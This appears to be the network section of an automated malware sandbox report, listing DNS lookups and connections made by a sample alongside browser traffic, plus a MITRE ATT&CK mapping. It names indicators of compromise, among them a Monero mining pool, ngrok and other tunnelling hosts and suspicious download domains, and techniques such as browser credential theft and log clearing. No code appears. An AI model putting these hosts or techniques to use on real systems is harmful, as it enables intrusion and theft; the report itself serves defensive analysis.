234.16.217.172.in-addr.arpa
8.8.8.8:53

youtube.googleapis.com

dns

firefox.exe

136 B
616 B
2
2

DNS Request

youtube.googleapis.com

DNS Response

216.58.212.234

216.58.201.106

216.58.204.74

172.217.16.234

142.250.200.10

142.250.178.10

142.250.179.234

142.250.187.202

142.250.200.42

142.250.180.10

216.58.213.10

172.217.169.74

142.250.187.234

216.58.212.202

172.217.169.10

172.217.169.42

DNS Request

youtube.googleapis.com

DNS Response

142.250.200.10

142.250.179.234

172.217.169.74

172.217.169.42

142.250.187.234

216.58.201.106

216.58.213.10

172.217.16.234

142.250.200.42

216.58.212.234

142.250.187.202

142.250.178.10

142.250.180.10

216.58.204.74
8.8.8.8:53

youtube.googleapis.com

dns

firefox.exe

136 B
616 B
2
2

DNS Request

youtube.googleapis.com

DNS Response

142.250.178.10

142.250.187.234

142.250.187.202

216.58.204.74

142.250.200.42

216.58.201.106

142.250.179.234

172.217.169.42

172.217.16.234

216.58.213.10

142.250.200.10

172.217.169.74

216.58.212.234

142.250.180.10

DNS Request

youtube.googleapis.com

DNS Response

172.217.16.234

142.250.180.10

142.250.200.10

142.250.200.42

142.250.179.234

216.58.213.10

216.58.212.234

142.250.178.10

172.217.169.74

216.58.204.74

216.58.201.106

216.58.212.202

172.217.169.42

142.250.187.202

172.217.169.10

142.250.187.234
8.8.8.8:53

youtube.googleapis.com

dns

firefox.exe

136 B
360 B
2
2

DNS Request

youtube.googleapis.com

DNS Response

2a00:1450:4009:81d::200a

2a00:1450:4009:81e::200a

2a00:1450:4009:820::200a

2a00:1450:4009:81f::200a

DNS Request

youtube.googleapis.com

DNS Response

2a00:1450:4009:820::200a

2a00:1450:4009:81f::200a

2a00:1450:4009:81e::200a

2a00:1450:4009:81d::200a
216.58.212.234:443

youtube.googleapis.com

https

firefox.exe

2.2kB
7.2kB
9
9
8.8.8.8:53

234.212.58.216.in-addr.arpa

dns

Dnscache

146 B
346 B
2
2

DNS Request

234.212.58.216.in-addr.arpa

DNS Request

234.212.58.216.in-addr.arpa
8.8.8.8:53

ogs.google.com

dns

firefox.exe

120 B
194 B
2
2

DNS Request

ogs.google.com

DNS Request

ogs.google.com

DNS Response

142.250.178.14

DNS Response

142.250.178.14
142.250.178.14:443

ogs.google.com

https

firefox.exe

2.4kB
10.8kB
12
13
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

164 B
196 B
2
2

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Response

35.244.181.201

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Response

35.244.181.201
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.balrog.prod.cloudops.mozgcp.net
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

142.250.180.14
8.8.8.8:53

ciscobinary.openh264.org

dns

firefox.exe

140 B
572 B
2
2

DNS Request

ciscobinary.openh264.org

DNS Response

88.221.134.155

88.221.134.209

DNS Request

ciscobinary.openh264.org

DNS Response

88.221.134.155

88.221.134.209
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

142.250.180.14
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

67 B
99 B
1
1

DNS Request

a19.dscg10.akamai.net

DNS Response

88.221.134.155

88.221.134.209
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
93 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

2a00:1450:4009:81e::200e
8.8.8.8:53

contacts.google.com

dns

firefox.exe

65 B
102 B
1
1

DNS Request

contacts.google.com

DNS Response

142.250.178.14
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

134 B
246 B
2
2

DNS Request

a19.dscg10.akamai.net

DNS Response

2a02:26f0:a1::58dd:86d1

2a02:26f0:a1::58dd:869b

DNS Request

a19.dscg10.akamai.net

DNS Response

2a02:26f0:a1::58dd:86d1

2a02:26f0:a1::58dd:869b
8.8.8.8:53

signaler-pa.clients6.google.com

dns

firefox.exe

154 B
186 B
2
2

DNS Request

signaler-pa.clients6.google.com

DNS Request

signaler-pa.clients6.google.com

DNS Response

142.250.200.42

DNS Response

142.250.179.234
142.250.180.14:443

redirector.gvt1.com

https

firefox.exe

1.9kB
9.3kB
7
10
8.8.8.8:53

signaler-pa.clients6.google.com

dns

firefox.exe

154 B
186 B
2
2

DNS Request

signaler-pa.clients6.google.com

DNS Response

142.250.178.10

DNS Request

signaler-pa.clients6.google.com

DNS Response

142.250.178.10
142.250.178.14:443

contacts.google.com

https

firefox.exe

2.2kB
9.4kB
10
11
8.8.8.8:53

r2---sn-5hnednss.gvt1.com

dns

firefox.exe

142 B
232 B
2
2

DNS Request

r2---sn-5hnednss.gvt1.com

DNS Response

172.217.132.199

DNS Request

r2---sn-5hnednss.gvt1.com

DNS Response

172.217.132.199
8.8.8.8:53

signaler-pa.clients6.google.com

dns

firefox.exe

154 B
210 B
2
2

DNS Request

signaler-pa.clients6.google.com

DNS Request

signaler-pa.clients6.google.com

DNS Response

2a00:1450:4009:80b::200a

DNS Response

2a00:1450:4009:80b::200a
8.8.8.8:53

r2.sn-5hnednss.gvt1.com

dns

firefox.exe

138 B
170 B
2
2

DNS Request

r2.sn-5hnednss.gvt1.com

DNS Request

r2.sn-5hnednss.gvt1.com

DNS Response

172.217.132.199

DNS Response

172.217.132.199
8.8.8.8:53

r2.sn-5hnednss.gvt1.com

dns

firefox.exe

138 B
194 B
2
2

DNS Request

r2.sn-5hnednss.gvt1.com

DNS Response

2a00:1450:400e:1b::7

DNS Request

r2.sn-5hnednss.gvt1.com

DNS Response

2a00:1450:400e:1b::7
8.8.8.8:53

201.181.244.35.in-addr.arpa

dns

Dnscache

73 B
126 B
1
1

DNS Request

201.181.244.35.in-addr.arpa
142.250.200.42:443

signaler-pa.clients6.google.com

https

firefox.exe

13.3kB
17.2kB
42
56
8.8.8.8:53

14.180.250.142.in-addr.arpa

dns

Dnscache

146 B
224 B
2
2

DNS Request

14.180.250.142.in-addr.arpa

DNS Request

14.180.250.142.in-addr.arpa
8.8.8.8:53

155.134.221.88.in-addr.arpa

dns

Dnscache

73 B
139 B
1
1

DNS Request

155.134.221.88.in-addr.arpa
172.217.132.199:443

r2.sn-5hnednss.gvt1.com

https

firefox.exe

1.8kB
5.9kB
5
8
8.8.8.8:53

api.ipify.org

dns

gem1.exe

118 B
214 B
2
2

DNS Request

api.ipify.org

DNS Response

104.26.13.205

104.26.12.205

172.67.74.152

DNS Request

api.ipify.org

DNS Response

104.26.13.205

104.26.12.205

172.67.74.152
8.8.8.8:53

199.132.217.172.in-addr.arpa

dns

Dnscache

148 B
224 B
2
2

DNS Request

199.132.217.172.in-addr.arpa

DNS Request

199.132.217.172.in-addr.arpa
8.8.8.8:53

173.187.63.66.in-addr.arpa

dns

Dnscache

144 B
268 B
2
2

DNS Request

173.187.63.66.in-addr.arpa

DNS Request

173.187.63.66.in-addr.arpa
8.8.8.8:53

205.13.26.104.in-addr.arpa

dns

Dnscache

144 B
268 B
2
2

DNS Request

205.13.26.104.in-addr.arpa

DNS Request

205.13.26.104.in-addr.arpa
8.8.8.8:53

c.pki.goog

dns

gem1.exe

112 B
214 B
2
2

DNS Request

c.pki.goog

DNS Response

142.250.178.3

DNS Request

c.pki.goog

DNS Response

142.250.178.3
142.250.200.42:443

signaler-pa.clients6.google.com

https

firefox.exe

2.8kB
12.9kB
15
16
8.8.8.8:53

urlhaus.abuse.ch

dns

._cache_New Text Document mod.exe

62 B
167 B
1
1

DNS Request

urlhaus.abuse.ch

DNS Response

151.101.130.49

151.101.66.49

151.101.194.49

151.101.2.49
8.8.8.8:53

49.130.101.151.in-addr.arpa

dns

Dnscache

73 B
133 B
1
1

DNS Request

49.130.101.151.in-addr.arpa
8.8.8.8:53

pool.supportxmr.com

dns

65 B
135 B
1
1

DNS Request

pool.supportxmr.com

DNS Response

141.94.96.195

141.94.96.71

141.94.96.144
8.8.8.8:53

195.96.94.141.in-addr.arpa

dns

144 B
224 B
2
2

DNS Request

195.96.94.141.in-addr.arpa

DNS Request

195.96.94.141.in-addr.arpa
8.8.8.8:53

docs.google.com

dns

122 B
154 B
2
2

DNS Request

docs.google.com

DNS Response

142.250.179.238

DNS Request

docs.google.com

DNS Response

142.250.179.238
8.8.8.8:53

o.pki.goog

dns

112 B
214 B
2
2

DNS Request

o.pki.goog

DNS Response

142.250.178.3

DNS Request

o.pki.goog

DNS Response

142.250.178.3
8.8.8.8:53

drive.usercontent.google.com

dns

148 B
180 B
2
2

DNS Request

drive.usercontent.google.com

DNS Request

drive.usercontent.google.com

DNS Response

216.58.212.193

DNS Response

216.58.212.193
8.8.8.8:53

193.212.58.216.in-addr.arpa

dns

73 B
171 B
1
1

DNS Request

193.212.58.216.in-addr.arpa
8.8.8.8:53

43.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

43.229.111.52.in-addr.arpa
172.217.169.78:443

drive.google.com

https

80.4kB
21.4kB
76
64
8.8.8.8:53

docs.google.com

dns

122 B
154 B
2
2

DNS Request

docs.google.com

DNS Request

docs.google.com

DNS Response

142.250.179.238

DNS Response

142.250.179.238
8.8.8.8:53

docs.google.com

dns

122 B
178 B
2
2

DNS Request

docs.google.com

DNS Request

docs.google.com

DNS Response

2a00:1450:4009:81d::200e

DNS Response

2a00:1450:4009:81d::200e
142.250.179.238:443

docs.google.com

https

2.2kB
9.4kB
10
11
142.251.173.84:443

accounts.google.com

https

16.7kB
17.1kB
20
28
8.8.8.8:53

urlhaus.abuse.ch

dns

._cache_New Text Document mod.exe

62 B
167 B
1
1

DNS Request

urlhaus.abuse.ch

DNS Response

151.101.130.49

151.101.66.49

151.101.194.49

151.101.2.49
172.217.169.78:443

drive.google.com

https

10.3kB
4.3kB
11
13
8.8.8.8:53

42.192.213.154.in-addr.arpa

dns

73 B
134 B
1
1

DNS Request

42.192.213.154.in-addr.arpa
8.8.8.8:53

115.34.106.151.in-addr.arpa

dns

146 B
226 B
2
2

DNS Request

115.34.106.151.in-addr.arpa

DNS Request

115.34.106.151.in-addr.arpa
8.8.8.8:53

urlhaus.abuse.ch

dns

._cache_New Text Document mod.exe

62 B
167 B
1
1

DNS Request

urlhaus.abuse.ch

DNS Response

151.101.2.49

151.101.130.49

151.101.194.49

151.101.66.49
8.8.8.8:53

49.2.101.151.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

49.2.101.151.in-addr.arpa
8.8.8.8:53

2.86.121.87.in-addr.arpa

dns

140 B
260 B
2
2

DNS Request

2.86.121.87.in-addr.arpa

DNS Request

2.86.121.87.in-addr.arpa
8.8.8.8:53

15.142.90.47.in-addr.arpa

dns

142 B
284 B
2
2

DNS Request

15.142.90.47.in-addr.arpa

DNS Request

15.142.90.47.in-addr.arpa
8.8.8.8:53

32.168.58.82.in-addr.arpa

dns

142 B
252 B
2
2

DNS Request

32.168.58.82.in-addr.arpa

DNS Request

32.168.58.82.in-addr.arpa
8.8.8.8:53

244.51.27.23.in-addr.arpa

dns

142 B
142 B
2
2

DNS Request

244.51.27.23.in-addr.arpa

DNS Request

244.51.27.23.in-addr.arpa
8.8.8.8:53

0.tcp.in.ngrok.io

dns

126 B
158 B
2
2

DNS Request

0.tcp.in.ngrok.io

DNS Response

13.202.226.61

DNS Request

0.tcp.in.ngrok.io

DNS Response

3.108.97.190
8.8.8.8:53

github.com

dns

112 B
144 B
2
2

DNS Request

github.com

DNS Response

20.26.156.215

DNS Request

github.com

DNS Response

20.26.156.215
8.8.8.8:53

objects.githubusercontent.com

dns

150 B
278 B
2
2

DNS Request

objects.githubusercontent.com

DNS Response

185.199.111.133

185.199.109.133

185.199.110.133

185.199.108.133

DNS Request

objects.githubusercontent.com

DNS Response

185.199.108.133

185.199.111.133

185.199.110.133

185.199.109.133
8.8.8.8:53

215.156.26.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

215.156.26.20.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

112 B
144 B
2
2

DNS Request

ip-api.com

DNS Response

208.95.112.1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

evilbit.pro

dns

114 B
178 B
2
2

DNS Request

evilbit.pro

DNS Response

104.21.95.99

172.67.144.26

DNS Request

evilbit.pro

DNS Response

172.67.144.26

104.21.95.99
8.8.8.8:53

upload.vina-host.com

dns

66 B
82 B
1
1

DNS Request

upload.vina-host.com

DNS Response

125.212.220.95
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

77.41.56.212.in-addr.arpa

dns

142 B
226 B
2
2

DNS Request

77.41.56.212.in-addr.arpa

DNS Request

77.41.56.212.in-addr.arpa
8.8.8.8:53

99.95.21.104.in-addr.arpa

dns

142 B
266 B
2
2

DNS Request

99.95.21.104.in-addr.arpa

DNS Request

99.95.21.104.in-addr.arpa
8.8.8.8:53

test.aionclassic.pro

dns

132 B
164 B
2
2

DNS Request

test.aionclassic.pro

DNS Response

80.72.24.103

DNS Request

test.aionclassic.pro

DNS Response

80.72.24.103
8.8.8.8:53

95.220.212.125.in-addr.arpa

dns

219 B
162 B
3
1

DNS Request

95.220.212.125.in-addr.arpa

DNS Request

95.220.212.125.in-addr.arpa

DNS Request

95.220.212.125.in-addr.arpa
8.8.8.8:53

168.67.125.45.in-addr.arpa

dns

72 B
101 B
1
1

DNS Request

168.67.125.45.in-addr.arpa
8.8.8.8:53

qrpn9be.localto.net

dns

130 B
162 B
2
2

DNS Request

qrpn9be.localto.net

DNS Response

185.141.35.21

DNS Request

qrpn9be.localto.net

DNS Response

185.141.35.21
142.250.179.238:443

docs.google.com

https

4.8kB
3.4kB
5
7
8.8.8.8:53

www.kasihcommunityschool.sch.id

dns

154 B
214 B
2
2

DNS Request

www.kasihcommunityschool.sch.id

DNS Response

66.63.187.250

DNS Request

www.kasihcommunityschool.sch.id

DNS Response

66.63.187.250
8.8.8.8:53

113.216.124.147.in-addr.arpa

dns

148 B
280 B
2
2

DNS Request

113.216.124.147.in-addr.arpa

DNS Request

113.216.124.147.in-addr.arpa
8.8.8.8:53

webmail.kasihcommunityschool.sch.id

dns

162 B
194 B
2
2

DNS Request

webmail.kasihcommunityschool.sch.id

DNS Request

webmail.kasihcommunityschool.sch.id

DNS Response

66.63.187.250

DNS Response

66.63.187.250
8.8.8.8:53

10.14.140.82.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

10.14.140.82.in-addr.arpa
8.8.8.8:53

www.fexe-tmp-1.top

dns

274 B
492 B
4
4

DNS Request

www.fexe-tmp-1.top

DNS Request

www.fexe-tmp-1.top

DNS Response

185.221.219.112

DNS Response

185.221.219.112

DNS Request

LETSQOOO-62766.portmap.host

DNS Request

LETSQOOO-62766.portmap.host
8.8.8.8:53

55.65.240.43.in-addr.arpa

dns

213 B
372 B
3
3

DNS Request

55.65.240.43.in-addr.arpa

DNS Request

55.65.240.43.in-addr.arpa

DNS Request

55.65.240.43.in-addr.arpa
8.8.8.8:53

112.219.221.185.in-addr.arpa

dns

148 B
244 B
2
2

DNS Request

112.219.221.185.in-addr.arpa

DNS Request

112.219.221.185.in-addr.arpa
8.8.8.8:53

wiso-fs-1.top

dns

118 B
150 B
2
2

DNS Request

wiso-fs-1.top

DNS Response

185.221.219.112

DNS Request

wiso-fs-1.top

DNS Response

185.221.219.112
8.8.8.8:53

wt-tmp-1.top

dns

116 B
148 B
2
2

DNS Request

wt-tmp-1.top

DNS Request

wt-tmp-1.top

DNS Response

185.221.219.112

DNS Response

185.221.219.112
8.8.8.8:53

run-motherboard.gl.at.ply.gg

dns

148 B
180 B
2
2

DNS Request

run-motherboard.gl.at.ply.gg

DNS Request

run-motherboard.gl.at.ply.gg

DNS Response

147.185.221.17

DNS Response

147.185.221.17
8.8.8.8:53

wzt5xcg.localto.net

dns

130 B
162 B
2
2

DNS Request

wzt5xcg.localto.net

DNS Request

wzt5xcg.localto.net

DNS Response

116.203.56.216

DNS Response

116.203.56.216
8.8.8.8:53

moonloaderupdate.ru

dns

130 B
162 B
2
2

DNS Request

moonloaderupdate.ru

DNS Request

moonloaderupdate.ru

DNS Response

37.140.192.16

DNS Response

37.140.192.16
8.8.8.8:53

location.services.mozilla.com

dns

75 B
153 B
1
1

DNS Request

location.services.mozilla.com

DNS Response

35.190.72.216
8.8.8.8:53

prod.classify-client.prod.webservices.mozgcp.net

dns

94 B
110 B
1
1

DNS Request

prod.classify-client.prod.webservices.mozgcp.net

DNS Response

35.190.72.216
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

188 B
374 B
2
2

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

prod.classify-client.prod.webservices.mozgcp.net

dns

188 B
374 B
2
2

DNS Request

prod.classify-client.prod.webservices.mozgcp.net

DNS Request

prod.classify-client.prod.webservices.mozgcp.net
35.190.72.216:443

prod.classify-client.prod.webservices.mozgcp.net

https

1.8kB
4.3kB
6
6
8.8.8.8:53

216.72.190.35.in-addr.arpa

dns

144 B
248 B
2
2

DNS Request

216.72.190.35.in-addr.arpa

DNS Request

216.72.190.35.in-addr.arpa
8.8.8.8:53

spocs.getpocket.com

dns

firefox.exe

65 B
131 B
1
1

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166
8.8.8.8:53

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

100 B
128 B
1
1

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

2600:1901:0:74e4::
34.149.97.1:443

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

https

1.8kB
4.4kB
6
6
8.8.8.8:53

shavar.prod.mozaws.net

dns

68 B
116 B
1
1

DNS Request

shavar.prod.mozaws.net

DNS Response

52.41.23.50

44.233.129.8

44.235.50.64
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

82 B
98 B
1
1

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Response

34.117.188.166
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

164 B
350 B
2
2

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Request

prod.ads.prod.webservices.mozgcp.net
8.8.8.8:53

shavar.prod.mozaws.net

dns

68 B
153 B
1
1

DNS Request

shavar.prod.mozaws.net
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
131 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
8.8.8.8:53

64.50.235.44.in-addr.arpa

dns

142 B
266 B
2
2

DNS Request

64.50.235.44.in-addr.arpa

DNS Request

64.50.235.44.in-addr.arpa
8.8.8.8:53

tracking-protection.cdn.mozilla.net

dns

81 B
143 B
1
1

DNS Request

tracking-protection.cdn.mozilla.net

DNS Response

34.120.158.37
8.8.8.8:53

tracking-protection.prod.mozaws.net

dns

81 B
97 B
1
1

DNS Request

tracking-protection.prod.mozaws.net

DNS Response

34.120.158.37
8.8.8.8:53

tracking-protection.prod.mozaws.net

dns

81 B
166 B
1
1

DNS Request

tracking-protection.prod.mozaws.net
8.8.8.8:53

37.158.120.34.in-addr.arpa

dns

144 B
124 B
2
1

DNS Request

37.158.120.34.in-addr.arpa

DNS Request

37.158.120.34.in-addr.arpa
8.8.8.8:53

tracking-protection.cdn.mozilla.net

dns

162 B
286 B
2
2

DNS Request

tracking-protection.cdn.mozilla.net

DNS Response

34.120.158.37

DNS Request

tracking-protection.cdn.mozilla.net

DNS Response

34.120.158.37

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Query Registry

Remote System Discovery

T1018

System Information Discovery